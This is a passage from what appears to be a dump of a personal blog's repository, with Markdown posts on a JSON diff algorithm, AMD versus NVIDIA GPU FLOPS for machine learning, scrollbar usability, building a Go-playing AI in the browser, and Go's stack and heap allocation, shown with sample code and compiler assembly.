one, so we take the average of the maximum similarity between each pair of elements of each list.\n* For atoms, we are fine with value equality.\n\n\n\n## Array Pairing\n\nFinding an ideal match between two lists sounds a lot like the [assignment problem for bipartite graphs](https://en.wikipedia.org/wiki/Assignment_problem). Imagine you own a fleet of available taxis. A set of passengers need picking up across town. The assignment problem wants to minimize the overall time that it takes for each taxi to arrive at a passenger’s location.\n\n\n\n_Above, minimizing the overall time. Below, minimizing the best time._\n\nIn our case, we want to minimize the best time, not the overall time. Among two array pairings of size 2, one with similarities 0.9 and 0.1, the other with similarities 0.8 and 0.4, one of the elements doesn’t seem to have been moved; it looks like an element was deleted and another was added. Given that, the pairing with 0.9 is most logical, and that is the one we want. Yet, maximizing the overall similarity would yield the inferior (0.8, 0.4) pairing.\n\n\n\nThe assignment problem has an O(n^3) polynomial solution, while the array pairing problem has an O(n^2) solution, which means it has the added bonus of being fast.\n\nIn fact, this problem is closer to the [weakly stable marriage problem](https://en.wikipedia.org/wiki/Stable_marriage_problem). However, it too can yield suboptimal results. Instead of optimizing for the highest similarity, it is content with any pairing for which no change could produce a pair with a higher similarity than each element of the pair had before. Depending on the ordering of elements in the lists, it can choose poorer pairings for our purposes.\n\nSome diffs offer move operations (such as [rfc6902-json-diff](https://github.com/cqql/rfc6902-json-diff-js), [jsondiffpatch](https://github.com/benjamine/jsondiffpatch)). However, array pairing is not just about detecting moves; we want to detect the most logical moves. The root of the problem with LCS is that it needs to know about exact equality. Our fuzzy pairing can detect the most likely equality. LCS targets a response with the highest number of elements remaining in the same order; our pairing targets one with the most intuitive moves.\n\nIts weakness is the quality of the similarity function, which empirically seems to give good answers, and can be improved by user-provided heuristics.\n\n## Index Shifting\n\nThere is quite a bit of fun in turning the indices we got from pairing (which come directly from the positions of the source and target arrays) to ones that can be used for patching purposes. Indeed, when applying the diff, we take each operation and apply it sequentially. We expect indices to be offset by previous operations.\n\nFor instance, `[3, 2]` diffed with `[1, 2, 3]` will detect a pairing from index 0 of the source to index 2 of the target, but since an element is inserted at the beginning of the list prior to the move operation, that operation must be from index 1 to 2, instead of 0 to 2.\n\nFirst, we need to perform all removals from the list, starting with the removal with the highest index (to avoid offsetting the subsequent removals). We compute from them a function that maps indices of elements of the list from where they were before the removals to where they are afterwards. We do the same, reversed, with the additions we plan to perform after the removals and the moves are done.\n\nWe now need two insights into the problem at hand.\n\n1. The pairs we have form a list of rings. Indeed, if whatever was at position i was sent to position j, whatever was at position j cannot have stayed at j. Therefore i goes to j, which goes to k, which goes to… well, at some point it has to come back to i, because the list is finite. Besides, we know that the source and target arrays have the same length.\n2. Each ring will rotate exactly once. When it does, no other element of the list will change position. As a result, a ring’s operations won’t offset the indices of the other rings.\n\nAs a result, the trickiest bit of the implementation is merely to detect offset changes in operations within a ring. Then we register the operations: first the removals, then the moves, then the additions. Done!\n\n## Format Design\n\nI will readily admit that producing a format that pleases all is impossible. That won’t stop me from judging them.\n\nThe [HashDiff](https://github.com/liufengyun/hashdiff) format for paths (eg. `foo[0].bar`) is awkward for machines and not that nice for humans to read.\n\n[RFC 6902](http://tools.ietf.org/html/rfc6902) is the go-to standard. Unfortunately, it chose to use [RFC 6901](http://tools.ietf.org/html/rfc6901), aka. JSON pointer, for paths (eg. `/foo/0/bar`).\n\nI have no idea why [RFC 6902](http://tools.ietf.org/html/rfc6902) did not simply use a list of strings and numbers. It is easy for humans to read, easy for machines to traverse (they have to convert the string to that list otherwise), and while it does save a few bytes when serialized, [RFC 6902](http://tools.ietf.org/html/rfc6902) is far from being a dense format to begin with. Finally, JSON pointer is forced to use a quirky escaping system: slashes are converted to `~1` and tildes to `~0`.\n\nBut it is the standard… so I accepted its flaws and rolled with it.\n\n## The road is long but fogless\n\nAs I wished that this had existed when I went fishing for an appropriate library, I published this new algorithm as a [gem](https://rubygems.org/gems/json-diff), whose open-source repository is [right here](https://github.com/espadrine/json-diff).\n\nThere are countless possible improvements we could make. Off the top of my head:\n\n* Optional LCS,\n* String diffing,\n* SVG output.\n\n## Epilogue\n\nThis diffing algorithm allowed me to detect three problematic bugs which therefore never impacted anyone. When we switched to the new search engine, we gradually increased the proportion of users that it impacted. The higher it went, the more confident we were, until we reached 100%.\n\nWe changed the engine with the train at full throttle. Nobody noticed a thing!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-10-26T21:34:00Z\",\n \"keywords\": \"sync\" }\n</script>\n"
},
{
"alpha_fraction": 0.6681157350540161,
"alphanum_fraction": 0.7379070520401001,
"avg_line_length": 57.84651184082031,
"blob_id": "2087402c67d91641d7a34a86f00de0d029f8559c",
"content_id": "81d4da8dec42b93faa25c851f70c711f87fa3e08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12731,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 215,
"path": "/blog/src/recomputing-gpu-performance.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Recomputing ML GPU performance: AMD vs. NVIDIA\n\nI am pretty impressed seeing [Lisa Su][] doing her best to steer the AMD ship towards\nbetter AI support in GPUs, with the [Huggingface partnership][] and by convincing\nGeorge Hotz to submit more bug reports.\n\n(For context, [Hotz raised $5M][] to improve RX 7900 XTX support and sell a $15K\nprebuilt consumer computer that runs 65B-parameter LLMs. A plethora of driver\ncrashes later, he almost [gave up on AMD][].)\n\nThere’s quite a few issues to overcome, though.\nWhile that GPU is great\n([Stable Diffusion iteration speed per GPU cost][] is top-tier),\na cursory study would be flawed:\npublic GPU benchmarks like TechPowerUp, TomsHardware, etc. give:\n\n- **RX 7900 XTX:** [123 TFLOPS][RX public perf]\n- **RTX 4090:** [82.58 TFLOPS][RTX public perf]\n\nWhere do the figures come from?\n\nWhile there is no official breakdown,\nonly [official figures][RX 7900 XTX specs], people widely compute it this way:\n\n- For **NVIDIA**:\n [Boost Clock (THz) × CUDA Cores × 2][RTX 4090 specs]\n (since the FMA instruction does two floating-point operations\n (a multiplication and an addition) in 1 CUDA core cycle).\n- For **AMD** on RDNA3:\n [Boost Frequency (THz) × Stream processors × 2 (dual issue) × 4 (dot product)][RX 7900 XTX specs],\n as [RDNA3 has `V_DUAL_DOT2ACC_F32_F16`][RDNA3],\n which does two dot products (a×b+c×d+e, 4 operations),\n in 1 processor cycle.\n\n<table>\n <tr><th> Name </th><th> Price </th><th> Processors </th><th> Frequency </th><th> TFLOPS (FP16) </th><th> Perf/€ </th>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xtx\">RX 7900 XTX</a> </td>\n <td> €1110 </td><td> 6144 </td><td> 2.5 GHz </td><td> 122.88 </td><td> 0.1107 </td>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xt\">RX 7900 XT</a> </td>\n <td> €942 </td><td> 5376 </td><td> 2.4 GHz </td><td> 103.22 </td><td> 0.1096 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_54756033603dff4c2_db18_46bd_9cc1_e7ad0debbbd0\">RTX 4090</a> </td>\n <td> €1770 </td><td> 16384 </td><td> 2.52 GHz </td><td> 82.58 </td><td> 0.0467 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3060</a> </td>\n <td> €314 </td><td> 3584 </td><td> 1.78 GHz </td><td> 12.76 </td><td> 0.0405 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3080</a> </td>\n <td> €905 </td><td> 8704 </td><td> 1.71 GHz </td><td> 29.76 </td><td> 0.0329 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3090</a> </td>\n <td> €1500 </td><td> 10496 </td><td> 1.70 GHz </td><td> 35.68 </td><td> 0.0238 </td>\n</table>\n\nThat is an unjust comparison, though, because AMD’s instruction is more niche\nthan FMA (hitting this performance sweet spot is thus uncommon),\nand because both of those GPUs have other tricks up their sleeves,\nyielding superior FLOPS.\n\nThe [big one][Dettmers] on NVIDIA are [Tensor cores][].\nWith them, you can run an instruction that does\n[a 4×4 to 4×8 matrix multiplication (page 25)][Ampere]\nin 1 cycle within a single Tensor Core (32 CUDA cores).\n\n2×4^2×8 (matmul ops) ÷ 1 (cycles) = 256 ops/TC/cycle.\n\n(There is [some variation between NVIDIA GPUs][Ampere blog]\non which matrix sizes are supported and on how many cycles the instruction takes,\nand NVIDIA keeps major aspects of their instruction set secret,\nbut on recent 30- and 40-series, this 256 number seems fairly constant.)\n\n\n\nThat actually puts the RTX 4090 at\n256 × 512 (Tensor Cores) × 2.52 (GHz)\n÷ 1K (GHz per teracycle/s) = [330 TFLOPS in FP16][NVIDIA wiki]…\nMuch higher than the 123 TFLOPS that impressed Hotz on the RX 7900 XTX!\n\nBut AMD now has the same trick.\nIn [RDNA3][], with [WMMA][], the RX 7900 XTX has an instruction,\n[`V_WMMA_F16_16X16X16_F16`][RDNA3]\nthat do two 16×16 matrix multiplications in [32 cycles][AMD cycles],\nin a single Compute Unit (two sets of 32 threads).\n\n2×16^3 (matmul ops) × 2 ÷ 32 (cycles) = 512 ops/CU/cycle.\n\nThis uses the same underlying silicon circuits as `V_DUAL_DOT2ACC_F32_F16`:\nthe architecture lays out the matrices in Vector General-Purpose Registers.\nEach cell of the output matrix is computed by multiplying\none row from input matrix A with one column from input matrix B,\ntwo input cells at a time\n(two adjacent input A row cells packed inside the same VGPR,\nand two adjacent input B column cells packed together inside another VGPR),\nso they can be used by the packed dot product single-cycle instruction.\nWithin that same instruction, encoded in VOPQ\n(a SIMD-like system to execute one operation\non an even register while it executes on an odd one at the same time),\nan adjacent output cell also multiplies through its first two input cells\nat the same time using dual issue.\n\nThe input row has size 16, so those two output cells are completed in 8 cycles.\nEach two adjacent output cells in their diagonal\nare computed with 16 parallel threads (on separate stream processors)\nwithin the same 8 cycles.\nWe have done two diagonals (32 output cells); there are 14 diagonals left.\nInside that Compute Unit, we still have 16 stream processors that we can use;\nthey can handle two more output diagonals within the same 8 cycles.\n\nOnce our first four diagonals are computed,\nwe sequentially compute the next 4 diagonals in the next 8 cycles.\nSo forth for the next 4, and the last 4 after that.\nIn total, we have computed the matrix multiplication\nin 32 cycles, which checks out.\n\nWhy can’t we do the matrix multiplication in 16 cycles\nby using all 64 threads inside of the Compute Unit?\n[Section 7.6 of the instruction set manual][RDNA3] indicates:\n\n> [Dual issue] is legal only for wave32.\n\nWMMA supports both wave32 and wave64, but it sounds like dual issue is\ndeactivated in wave64, and thus it would still take 32 cycles,\nmaking it an ill-documentedly unfavorable proposition, I believe.\n\nAll in all, using [WMMA][], the RX 7900 XTX can crank through\n512 × [96 (Compute Units) × 2.5 (GHz)][RX 7900 XTX specs]\n÷ 1K (GHz per teracycle/s) = [123 TFLOPS in FP16][AMD wiki]…\n\nThat ends up being less than half the performance of the RTX 4090.\nThe superior number of operations per Compute Unit is offset by the\ncrushingly lower number of cores.\nPerhaps the AMD strategy is to have the better circuit ready\nbefore migrating to the TSMC N5 (“5 nm”) process at a less affordable price.\n\nIn practice, the lower performance is less of an issue for AI training,\nbecause they are famously limited in the amount of parallelization opportunities\n(even the best training runs typically incur only 50% GPU use at a given time).\nThe VRAM bandwidth then matters a lot for large models,\nand the [RX 7900 XTX][RX 7900 XTX specs], despite using GDDR6 instead of GDDR6X,\nhas a higher bandwidth than the RTX 3090, thanks to its faster memory clock.\nStill, it also is lower than the RTX 4090 on that front\n(but at a lower price point).\n\n<table>\n <tr><th> Name </th><th> Price </th><th> TFLOPS (FP16) </th><th> Memory bandwidth (GB/s)</th><th> Value (TFLOPS·GB/s/€) </th>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_54756033603dff4c2_db18_46bd_9cc1_e7ad0debbbd0\">RTX 4090</a> </td>\n <td> €1770 </td><td> 330 </td><td> 1008 </td><td> 188 </td>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xtx\">RX 7900 XTX</a> </td>\n <td> €1110 </td><td> 123 </td><td> 960 </td><td> 106 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3080</a> </td>\n <td> €905 </td><td> 119 </td><td> 760 </td><td> 100 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3090</a> </td>\n <td> €1500 </td><td> 143 </td><td> 936 </td><td> 89 </td>\n <tr><td> <a href=\"https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xt\">RX 7900 XT</a> </td>\n <td> €942 </td><td> 103 </td><td> 800 </td><td> 87 </td>\n <tr><td> <a href=\"https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_44862952d932bba4_58ad_4ca4_a3d3_84a2295d2b85\">RTX 3060</a> </td>\n <td> €314 </td><td> 51 </td><td> 360 </td><td> 58 </td>\n</table>\n\nThus the RX 7900 XTX is not technically the best TFLOPS per price,\nas was presumed in Hotz’s [raise announcement][Hotz raised $5M].\nBut that metric is not crucial for the purpose of making LLM machines,\nand purely looking at hardware, that GPU is a fine choice for that,\nin part because it has a fairer RAM per dollar offer,\nso that it can hold a large model without needing pricier GPUS,\nyet likely reaching reasonable inference speeds.\n\nThe other thorns on the side of AMD in AI, though, rear their ugly heads:\n- [The compilers don’t produce great instructions][microbenchmark];\n- The drivers crash frequently: ML workloads feel experimental;\n- Software adoption is getting there,\n but kernels are less optimized within frameworks,\n in particular because of the fracture between ROCm and CUDA.\n When you are a developer and you need to write code twice,\n one version won’t be as good, and it is the one with less adoption;\n- StackOverflow mindshare is lesser. Debugging problems is thus harder,\n as fewer people have encountered them.\n\n(I will note, however, that the wealth of information provided by AMD\noutshines that from NVIDIA tremendously,\neven though they could better vulgarize those subtleties and\nexplain how to perform specific workloads like BERT training,\ninto which NVIDIA puts welcome care.\nJust contrast [NVIDIA’s matmul page][NVIDIA GEMM] to [AMD’s][WMMA].\n[AMD doesn’t even recognize its own flagship GPUs as supported for ROCm][ROCm support],\nwhich is mindboggling coming from NVIDIA’s superior CUDA support.)\n\n[Lisa Su]: https://twitter.com/LisaSu/status/1669848494637735936\n[Huggingface partnership]: https://huggingface.co/blog/huggingface-and-amd\n[Hotz raised $5M]: https://geohot.github.io//blog/jekyll/update/2023/05/24/the-tiny-corp-raised-5M.html\n[gave up on AMD]: https://github.com/RadeonOpenCompute/ROCm/issues/2198#issuecomment-1574383483\n[Stable Diffusion iteration speed per GPU cost]: https://www.tomshardware.com/news/stable-diffusion-gpu-benchmarks\n[RX public perf]: https://www.techpowerup.com/gpu-specs/geforce-rtx-4090.c3889\n[RTX public perf]: https://www.tomshardware.com/reviews/amd-radeon-rx-7900-xtx-and-xt-review-shooting-for-the-top\n[RTX 4090 specs]: https://www.nvidia.com/en-us/geforce/graphics-cards/compare/#sectionenhanced_copy_54756033603dff4c2_db18_46bd_9cc1_e7ad0debbbd0\n[RX 7900 XTX specs]: https://www.amd.com/en/products/graphics/amd-radeon-rx-7900xtx\n[RDNA3]: https://www.amd.com/system/files/TechDocs/rdna3-shader-instruction-set-architecture-feb-2023_0.pdf\n[Dettmers]: https://timdettmers.com/2023/01/30/which-gpu-for-deep-learning/#Will_AMD_GPUs_ROCm_ever_catch_up_with_NVIDIA_GPUs_CUDA\n[Tensor Cores]: https://www.nvidia.com/en-us/data-center/tensor-cores/\n[Ampere]: https://www.nvidia.com/content/PDF/nvidia-ampere-ga-102-gpu-architecture-whitepaper-v2.pdf\n[Ampere blog]: https://developer.nvidia.com/blog/nvidia-ampere-architecture-in-depth/\n[NVIDIA wiki]: https://en.wikipedia.org/wiki/GeForce_40_series#Desktop\n[WMMA]: https://gpuopen.com/learn/wmma_on_rdna3/\n[AMD cycles]: https://github.com/RadeonOpenCompute/amd_matrix_instruction_calculator/blob/339d784e56e55752495192b0781ea162fc32e323/matrix_calculator.py#LL1139C26-L1139C26\n[ROCm support]: https://rocm.docs.amd.com/en/latest/release/gpu_os_support.html\n[NVIDIA GEMM]: https://docs.nvidia.com/deeplearning/performance/dl-performance-matrix-multiplication/index.html\n[AMD wiki]: https://en.wikipedia.org/wiki/RDNA_3#Desktop\n[microbenchmark]: https://chipsandcheese.com/2023/01/07/microbenchmarking-amds-rdna-3-graphics-architecture/\n\n---\n\n[Comments on Reddit](https://www.reddit.com/r/espadrine/comments/156bbmj/recomputing_gpu_performance/).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2023-06-18T21:40:09Z\",\n \"keywords\": \"gpu, ml\" }\n</script>\n"
},
{
"alpha_fraction": 0.7300699353218079,
"alphanum_fraction": 0.7496503591537476,
"avg_line_length": 50.07143020629883,
"blob_id": "d4fed191ac55f1d8e4a1c646b9e44bcd7184b701",
"content_id": "88de8a2ed481b152529d59eaab1e909823b45171",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 715,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 14,
"path": "/blog/src/scrollbar-ux-improvements.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Scrollbar UX Improvements\n\nThe UX of scrollbars is pretty bad, apart from drag-and-drop. Left-clicking on the empty space more than once quickly switches meaning, as the scrollbar reaches your mouse.\n\nLeft-clicking should do what middle-clicking does in KDE, as it is much saner: it scrolls to where you click.\n\nInstead, middle-clicking should systematically go down by a page. It is much more common to go one page down (to continue reading) than it is to go one page up. It should not switch direction as the scrollbar reaches the mouse.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-06-18T23:50:00Z\",\n \"keywords\": \"web\" }\n</script>\n"
},
{
"alpha_fraction": 0.7663499712944031,
"alphanum_fraction": 0.7743356823921204,
"avg_line_length": 57.57258224487305,
"blob_id": "3af019265c59ebec9cd7dda7f9adcb615ac27345",
"content_id": "2f4649f3af920c08d587f8d2389b9384a961e37e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7272,
"license_type": "no_license",
"max_line_length": 228,
"num_lines": 124,
"path": "/blog/src/a-go-browser-battle.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A Go Browser Battle\n\nI learned Go from my Dad — after all, we lived in Japan for a short while when I was little — but DeepMind's [foray][alphago-2017] into the venerable board game definitely renewed my interest.\n\n[alphago-2017]: https://events.google.com/alphago2017/\n\nMy friend [Jan], also intrigued, had started working on a browser-based interface to play the game.\n\n[Jan]: https://github.com/jankeromnes/\n\nSo I offered him a playful challenge: we would both try to build an interesting AI for the game, and we would pit them against each other.\nEach AI would be in a separate [WebWorker].\nAt each turn, they would receive the board state.\nThey would have one minute to come up with their move, in a best-of-five tournament.\n\nFrom what he told me, Jan will be trying to brute-force the search tree with a traditional minimax.\nHe is betting on a smart and fast board evaluation.\n\nAs for me, I started studying the [AlphaGo Nature paper].\nI took machine learning classes at University; time to apply what I learned!\n\n[AlphaGo Nature paper]: https://storage.googleapis.com/deepmind-media/alphago/AlphaGoNaturePaper.pdf\n\nI definitely don't have the computing power or the time to reach the level that AlphaGo achieved.\nIt took months of training and self-play on tens of GPUs and hundreds of CPUs.\nMy dream is to reach 1d; a rank roughly equivalent to a black belt in martial arts.\n\n## Stepping Stones\n\nGo games are typically saved as [SGF] files, which are plentiful on the Web.\nTherefore, the first step I needed to achieve was to have an SGF parser and a Go execution engine.\nThe engine is designed to give me a wealth of information about the game: what group is a stone part of, how many liberties that group has…\n\n[SGF]: http://www.red-bean.com/sgf/\n\n\n\nI downloaded all KGS games involving players that are 4d or above.\nI hope my design achieves 1d, so in principle, the AI will never reach that level of play.\n\nAside: I think it is interesting to think about learning in terms of *training capacity* and *model capacity*.\nHere, since we learn to mimick the moves of the training set, the AI can only be as smart as the training set, which puts a limit to how intelligent it can be.\nBut the model itself can achieve a superior level through self-play (which is what DeepMind did, obviously, since they reached a level beyond the top human player). Then, the level they can achieve is that of the model capacity.\nAn entity able to perfectly analyse all possible futures would have the highest possible model capacity.\n\nThe KGS dataset represents 1.7 million games.\nAfter rotating and reflecting each game, I should reach 13.5 million games, which should be enough to teach the neural network.\n\n\n\nJust like AlphaGo, I will first train a **move guesser** using a convolutional neural network.\nThat network reads the board through a hundred lenses called \"filters\" that focus on 3x3 squares (or 5x5 on the first layer).\nEach lens annotates every intersection with an analysis of its surroundings.\nThe annotated board is given as input to a different set of lenses, and so on, ten times.\nThe last annotated board rates the moves with how likely KGS players are to make them.\n\nThe move guesser can be used standalone, although I don't expect it to perform well.\nIts main purpose is to limit the number of moves you will look at on the search tree.\nExpanding too many nodes can really make your AI lose precious time.\n\nI also want to train a **win guesser**. It is another convolutional neural network.\nInstead of yielding likely moves, it will tell you who it thinks will win.\n\nWhile AlphaGo trained its win guesser from self-play games which also improved its move guesser, I am unsure whether I will have enough time to implement self-play tournaments.\nBut having a win guesser learn from the KGS data set is possible; it simply might yield poor results.\n\nFinally, if I have time to spare, I may implement **Monte-Carlo Tree Search** ([MCTS]).\nIt requires having a very fast move guesser (not the 10-layer monster).\nAlphaGo trained a shallower neural network for that purpose, feeding it, in addition to the board state, whether a given move matches a set of well-known patterns.\nThe paper claims it guesses about 24% of moves from their data set, at a meager 2 μs.\n\n[MCTS]: https://en.wikipedia.org/wiki/Monte-Carlo_Tree_Search\n\nFor this purpose, I am tempted to perform some custom statistical analysis on the training data.\nYet again, it depends on what that yields, and how much time I have.\n\nMCTS works by repeating the following steps:\n\n1. walk the tree through what is currently the best move,\n2. without adding nodes to the search tree, play with the weak move guesser until the end of the game,\n3. update the node's ancestors in the search tree to count the number of wins and losses, which may change what is the best move.\n\nWhen a node is walked through enough times, it gets expanded with the strong move guesser.\n\n## Into The Browser\n\nI plan on training the networks in Python with [Keras], which will use [TensorFlow] to benefit from its optimized C++ engine.\nI own a desktop computer that unfortunately features a weak-ish Nvidia GPU, but it will have to do!\n\nKeras is fast becoming the standard API to train and export neural nets; Microsoft recently touted its support as a front-end for [CNTK] when they unveiled [version 2][CNTK 2] of the library.\nInevitably, there are a couple libraries to convert Keras models to JavaScript.\n[Keras.js] most notably features GPU support, but using the GPU in a [WebWorker] is not yet possible.\nMaybe when all browsers implement [OffscreenCanvas] and Keras.js [implements support for it][Keras.js OffscreenCanvas]?\n\nAnd there's [WebDNN], which I will use.\n\nWebDNN is fastest when using [WebGPU], a standard that I hope will get traction, but that is currently Safari-only.\nHowever, it can compile the neural network to [WebAssembly], which should fit in a [WebWorker].\n\n[Keras]: https://keras.io/\n[TensorFlow]: https://www.tensorflow.org\n[CNTK]: https://www.microsoft.com/en-us/cognitive-toolkit/\n[CNTK 2]: https://docs.microsoft.com/en-us/cognitive-toolkit/ReleaseNotes/CNTK_2_0_Release_Notes\n[Keras.js]: https://github.com/transcranial/keras-js\n[OffscreenCanvas]: https://html.spec.whatwg.org/multipage/scripting.html#the-offscreencanvas-interface\n[Keras.js OffscreenCanvas]: https://github.com/transcranial/keras-js/issues/3\n[WebDNN]: https://mil-tokyo.github.io/webdnn/\n[WebGPU]: https://webkit.org/blog/7504/webgpu-prototype-and-demos/\n[WebAssembly]: http://webassembly.org/\n[WebWorker]: https://html.spec.whatwg.org/multipage/workers.html#workers\n\n## Dreams and Work\n\nThis will all be a free-time effort.\nThere is no planned date for the final confrontation.\n\nThe code for the SGF parser, Go engine, and AIs will be [here](https://github.com/espadrine/badukjs), and the UI code will be [there](https://github.com/jankeromnes/metaboard).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-06-16T16:53:49Z\",\n \"keywords\": \"baduk, ai\" }\n</script>\n"
},
{
"alpha_fraction": 0.7341254353523254,
"alphanum_fraction": 0.7471947073936462,
"avg_line_length": 98.67105102539062,
"blob_id": "9168701426aae8c298a9bee96204adce76f555c3",
"content_id": "20d6d4047d0d3384390ad20bd6f830a58dd02fce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7577,
"license_type": "no_license",
"max_line_length": 941,
"num_lines": 76,
"path": "/blog/src/close-to-the-metal.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Close to the metal\n\nWhat a strange expression. It is very much used by Go (the language) advocates (and by its authors; both titles overlap).\n\nMy understanding of \"**close to the metal**\" was that I knew at any point of the program when the memory I manipulate is on the stack or in the heap. As a result, I can reason about the memory layout and the efficiency of the data structures I create.\n\nIn fact, just like many fancy terms that I hear about programming languages, such as \"Write once, run everywhere\", \"Native\", \"App-scale\", and so on, this is just another expression of which I have yet to find the meaning.\n\nA couple of days ago, I came across [the following talk](http://talks.golang.org/2012/splash.article). One sentence really stood out in my head: \"it is legal (encouraged even) to take the address of a stack variable\".\n\nObviously, in most languages whose compiler I would call \"close to the metal\", taking the address of a stack variable is a very common operation. However, those languages have the habit of making the program crash if you are not careful about where data is freed, and what pointers point to. Yet, one of Go's redeeming qualities is to guarantee that pointer manipulation is safe (most of the time). What does it do to prevent the worst from happening?\n\nI wrote the following program with the intention of understanding how the compiler avoided a crash under the hood:\n\n package main\n \n import \"fmt\"\n \n func f() *int {\n i := 5\n pi := &i\n *pi ++\n fmt.Println(\"i = \", i)\n fmt.Println(\"pi = \", *pi)\n return pi\n }\n \n func main() {\n pi := f()\n fmt.Println(\"result = \", *pi)\n }\n\nI return a pointer that points to what I consider to be a stack variable, but really is simply a local variable. Then I dereference that pointer. If this was C, the stack variable would get destroyed upon returning from the function, and therefore the pointer would point to a forbidden address in memory. That should cause a crash.\n\nYou probably guessed at that point that this program doesn't crash. It returns the correct answer.\nHere goes the start of the generated assembly code for the function `f`, obtained with `go tool 6g -S program.go`:\n\n 0000 (program.go:5) TEXT f+0(SB),$152-8\n 0001 (program.go:6) MOVQ $type.int+0(SB),(SP)\n 0002 (program.go:6) CALL ,runtime.new+0(SB)\n 0003 (program.go:6) MOVQ 8(SP),CX\n 0004 (program.go:6) MOVL $5,(CX)\n 0005 (program.go:7) MOVQ CX,&i+-72(SP)\n 0006 (program.go:8) MOVL $1,AX\n 0007 (program.go:8) MOVQ CX,pi+-112(SP)\n 0008 (program.go:8) MOVL (CX),BP\n 0009 (program.go:8) ADDL AX,BP\n 0010 (program.go:8) MOVL BP,(CX)\n\nThe local variable `i` corresponds to the CX register. In it is placed the address of a freshly allocated heap slot the size of an `int`. We put 5 in the slot it points to, then we put CX to a slot on the stack which we say is the address of `i` (`&i+-72(SP)`), so that `i` is never conceptually on the stack.\n\nObviously, I then tried to make the function return `i` (the integer), instead of `pi` (the pointer to an integer). Then, the assembly clearly allocated memory for `i` on the stack, and `pi` did hold the address of a stack variable. In other words, the compiler tries to put the variable on the stack, and if that can hurt memory safety, it puts it on the heap.\n\nConsequence: in Go, knowing whether a variable is on the stack is non-trivial. The very same variable declaration can either occur on the stack or on the heap.\n\nI find this design great, but it does make me wonder what the authors mean by saying that the language is \"close to the metal\". This being said, knowing where the variable is stored doesn't matter, as long as we know the compiler does its best, and as long as we have tools to let us know where we can optimize, and what we can optimize.\n\nWhich brings me to **optimizing JavaScript**. I have had an interesting discussion last summer with the great Benjamin Peterson, who did outstanding work on Firefox' JS engine. We were talking about the availability (or lack thereof) of tail-call optimization in interpreters and compilers.\nHis comment on implementing it was that the programmer should be able to state his/her intention, in order to get feedback of the following kind: \"We're sorry, we were unable to perform tail-call optimization because…\"\n\nI feel like programmers should be able to know whenever an optimization they hope to achieve doesn't get performed. In Go, the case of knowing whether the variable is on the stack is a contrived example. In JavaScript, where the same kinds of tricks as discussed above are found everywhere, knowing where a function gets deoptimized because an argument was assumed to be an integer, and the function suddenly gets called with a string, is a valuable piece of information. Why was a string passed in? It might even be a bug.\n\nIn EcmaScript, there is a valid statement, [`debugger`](http://es5.github.com/#x12.15), which probably does what you think it does. Nothing, unless you're debugging. Adding syntax to help programmers is a natural thing to do. There needs to be syntax to warn the programmer when an optimization he/she hoped for doesn't get triggered, without having him/her look at bytecode or assembly code.\n\nThere are some attempts in the wild. V8 comes with a switch, `--trace-deopt`, which will give you all information about deoptimizations in a format of dubious legibility. Firefox has some primitives that give information about things that could have been optimized. The great Brian Hackett even made an [addon](https://addons.mozilla.org/en-US/firefox/addon/jit-inspector/) which highlights in shades of red pieces of code that couldn't get boosted by the JIT engine. However, the information it gives is quite cryptic; it is unclear to mere mortals how they should change their code to get the boost. Also, it is quite hard to navigate, since it tracks all JS code throughout the browser. Programmers want to know how *their code* does, and they don't want to jump through hoops to get that information. However, the idea of painting your code in red is one step closer to being told, \"Hey, this piece of code should be rewritten this way\".\n\nOn the standards front, the closest thing you get is something they call [Guards](http://wiki.ecmascript.org/doku.php?id=strawman:guards). This strawman amounts to type annotations that you can put anywhere you have a binding. However, it specifies that the code should throw if the type we specify for a variable isn't that of the data we feed it. That isn't quite the same thing as having a way to check for an optimization at all. Yet, the syntax itself would be valuable to request information about a certain class of bailouts.\n\nThere is 